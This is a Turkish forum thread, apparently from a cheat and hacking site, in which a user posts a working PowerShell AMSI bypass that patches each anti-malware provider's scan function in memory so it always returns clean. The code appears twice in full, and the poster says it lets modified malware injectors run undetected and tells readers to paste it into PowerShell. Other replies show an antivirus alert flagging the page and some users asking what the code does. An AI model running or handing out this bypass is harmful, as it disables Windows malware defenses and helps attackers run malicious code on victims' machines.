AMSI-Bypass

emrose · 20 Nis 2024

Bilişim suçlarından her türlü cezayı aldıktan sonra daha bu işlere bulaşmamak ve insanların kendisini eğitebilmesi için ilgilenen kişilerinde işine yarayacak AMSI-BYPASS:
Amsi Nedir: Öncelikle Windows sistemlerde win-defender'ın yanı sıra bir adet daha koruma bulunuyor,defender .exe .py gibi uzantıları incelerken amsi (Anti Malware Scan Interface) .bat .vbs gibi dosya uzantılarını inceler ve AMSI tarafından taranan dosyalar defender tarafında ekstra bir taramaya girmez. Yani .bat dosyanız varsa malware injectorunuz de cs veyahut ps ile yazıldıysa modifiyenizi yapıp kullanabilirsiniz.
Eğitim amaçlı paylaşılmıştır.

$Apis = @"
using System;
using System.Runtime.InteropServices;
public class Apis {
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("amsi")]
public static extern int AmsiInitialize(string appName, out Int64 context);
}
"@
Add-Type $Apis

$ret_zero = [byte[]] (0xb8, 0x0, 0x00, 0x00, 0x00, 0xC3)
$p = 0; $i = 0
$SIZE_OF_PTR = 8
[Int64]$ctx = 0

[Apis]::AmsiInitialize("MyScanner", [ref]$ctx)
$CAmsiAntimalware = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$ctx, 16)
$AntimalwareProvider = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$CAmsiAntimalware, 64)

while ($AntimalwareProvider -ne 0)
{

$AntimalwareProviderVtbl = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$AntimalwareProvider)
$AmsiProviderScanFunc = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$AntimalwareProviderVtbl, 24)

Write-host "[$i] Provider's scan function found!" $AmsiProviderScanFunc
[APIs]::VirtualProtect($AmsiProviderScanFunc, [uint32]6, 0x40, [ref]$p)
[System.Runtime.InteropServices.Marshal]::Copy($ret_zero, 0, [IntPtr]$AmsiProviderScanFunc, 6)

$i++
$AntimalwareProvider = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$CAmsiAntimalware, 64 + ($i*$SIZE_OF_PTR))
}

AresBlackrosa · 20 Nis 2024

Virüs programı niye bu konu için uyarı veriyor aw

Olay: İndirme reddedildi
Kullanıcı: -
Kullanıcı tipi: Başlatan
Uygulama adı: chrome.exe
Uygulama yolu: C:\Program Files\Google\Chrome\Application
Bileşen: Güvenli Tarama
Sonuç açıklaması: Engellendi
Tür: Truva atı
Ad: HEUR:Trojan.PowerShell.Inject.gen
Doğruluk: Sezgisel analiz
Tehdit düzeyi: Yüksek
Nesne türü: Dosya
Nesne adı: preview?_xfRequestUri=%2F&_xfWithData=1&_xfToken=1713640429%2C4357a72df07a0c5debf401079b2e6ba6&_xfResponseType=json
Nesne yolu: https://cheatglobal.com/konu/amsi-bypass.50582
Bir nesnenin MD5'i: E5E2F2DBEC48F296CC066D65CCBB25F5
Neden: Uzman analizi
Veritabanlarının sürüm tarihi: Bugün, 20.04.2024 16:20:00

muah · 20 Nis 2024

AresBlackrosa' Alıntı:
Virüs programı niye bu konu için uyarı veriyor aw

Olay: İndirme reddedildi
Kullanıcı: -
Kullanıcı tipi: Başlatan
Uygulama adı: chrome.exe
Uygulama yolu: C:\Program Files\Google\Chrome\Application
Bileşen: Güvenli Tarama
Sonuç açıklaması: Engellendi
Tür: Truva atı
Ad: HEUR:Trojan.PowerShell.Inject.gen
Doğruluk: Sezgisel analiz
Tehdit düzeyi: Yüksek
Nesne türü: Dosya
Nesne adı: preview?_xfRequestUri=%2F&_xfWithData=1&_xfToken=1713640429%2C4357a72df07a0c5debf401079b2e6ba6&_xfResponseType=json
Nesne yolu: https://cheatglobal.com/konu/amsi-bypass.50582
Bir nesnenin MD5'i: E5E2F2DBEC48F296CC066D65CCBB25F5
Neden: Uzman analizi
Veritabanlarının sürüm tarihi: Bugün, 20.04.2024 16:20:00

uzman neyi analiz etti aw sanırım kaspersky kullanıyorsun

AresBlackrosa · 20 Nis 2024

bnemuahdegilim' Alıntı:
uzman neyi analiz etti aw sanırım kaspersky kullanıyorsun

Hee, niye böyle yapıyor

emrose · 20 Nis 2024

bnemuahdegilim' Alıntı:
uzman neyi analiz etti aw sanırım kaspersky kullanıyorsun

tam demek istediğini anlamadım,neyi patchlediğini mi soruyorsun?

AresBlackrosa' Alıntı:
Virüs programı niye bu konu için uyarı veriyor aw

Olay: İndirme reddedildi
Kullanıcı: -
Kullanıcı tipi: Başlatan
Uygulama adı: chrome.exe
Uygulama yolu: C:\Program Files\Google\Chrome\Application
Bileşen: Güvenli Tarama
Sonuç açıklaması: Engellendi
Tür: Truva atı
Ad: HEUR:Trojan.PowerShell.Inject.gen
Doğruluk: Sezgisel analiz
Tehdit düzeyi: Yüksek
Nesne türü: Dosya
Nesne adı: preview?_xfRequestUri=%2F&_xfWithData=1&_xfToken=1713640429%2C4357a72df07a0c5debf401079b2e6ba6&_xfResponseType=json
Nesne yolu: https://cheatglobal.com/konu/amsi-bypass.50582
Bir nesnenin MD5'i: E5E2F2DBEC48F296CC066D65CCBB25F5
Neden: Uzman analizi
Veritabanlarının sürüm tarihi: Bugün, 20.04.2024 16:20:00

konuya girince kodu taradığı için yapıyor olabilir eğer konuya girince hatayı aldıysan

onun haricinde .exe veyahut farklı şekilde derlemenize gerek yok powershell açıp yapıştırırsanız:

Linkleri görebilmek için kayıt olmanız gerekmektedir

bu şekilde başarılı sonuç verecektir

mazedigger · 21 Nis 2024

Tam olarak ne işe yarıyor bu

inferno0k · 21 Nis 2024

mazedigger' Alıntı:
Tam olarak ne işe yarıyor bu

bende anlamadım ne işe yaradığını anlatırmısınız

Tarinbeyx99 · 26 Nis 2024

emrose' Alıntı:
Bilişim suçlarından her türlü cezayı aldıktan sonra daha bu işlere bulaşmamak ve insanların kendisini eğitebilmesi için ilgilenen kişilerinde işine yarayacak AMSI-BYPASS:
Amsi Nedir: Öncelikle Windows sistemlerde win-defender'ın yanı sıra bir adet daha koruma bulunuyor,defender .exe .py gibi uzantıları incelerken amsi (Anti Malware Scan Interface) .bat .vbs gibi dosya uzantılarını inceler ve AMSI tarafından taranan dosyalar defender tarafında ekstra bir taramaya girmez. Yani .bat dosyanız varsa malware injectorunuz de cs veyahut ps ile yazıldıysa modifiyenizi yapıp kullanabilirsiniz.
Eğitim amaçlı paylaşılmıştır.
$Apis = @"
using System;
using System.Runtime.InteropServices;
public class Apis {
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("amsi")]
public static extern int AmsiInitialize(string appName, out Int64 context);
}
"@
Add-Type $Apis

$ret_zero = [byte[]] (0xb8, 0x0, 0x00, 0x00, 0x00, 0xC3)
$p = 0; $i = 0
$SIZE_OF_PTR = 8
[Int64]$ctx = 0

[Apis]::AmsiInitialize("MyScanner", [ref]$ctx)
$CAmsiAntimalware = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$ctx, 16)
$AntimalwareProvider = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$CAmsiAntimalware, 64)

while ($AntimalwareProvider -ne 0)
{

$AntimalwareProviderVtbl = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$AntimalwareProvider)
$AmsiProviderScanFunc = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$AntimalwareProviderVtbl, 24)

Write-host "[$i] Provider's scan function found!" $AmsiProviderScanFunc
[APIs]::VirtualProtect($AmsiProviderScanFunc, [uint32]6, 0x40, [ref]$p)
[System.Runtime.InteropServices.Marshal]::Copy($ret_zero, 0, [IntPtr]$AmsiProviderScanFunc, 6)

$i++
$AntimalwareProvider = [System.Runtime.InteropServices.Marshal]::ReadInt64([IntPtr]$CAmsiAntimalware, 64 + ($i*$SIZE_OF_PTR))
}

AMSI-Bypass

Şuanda konuyu görüntüleyen kullanıcılar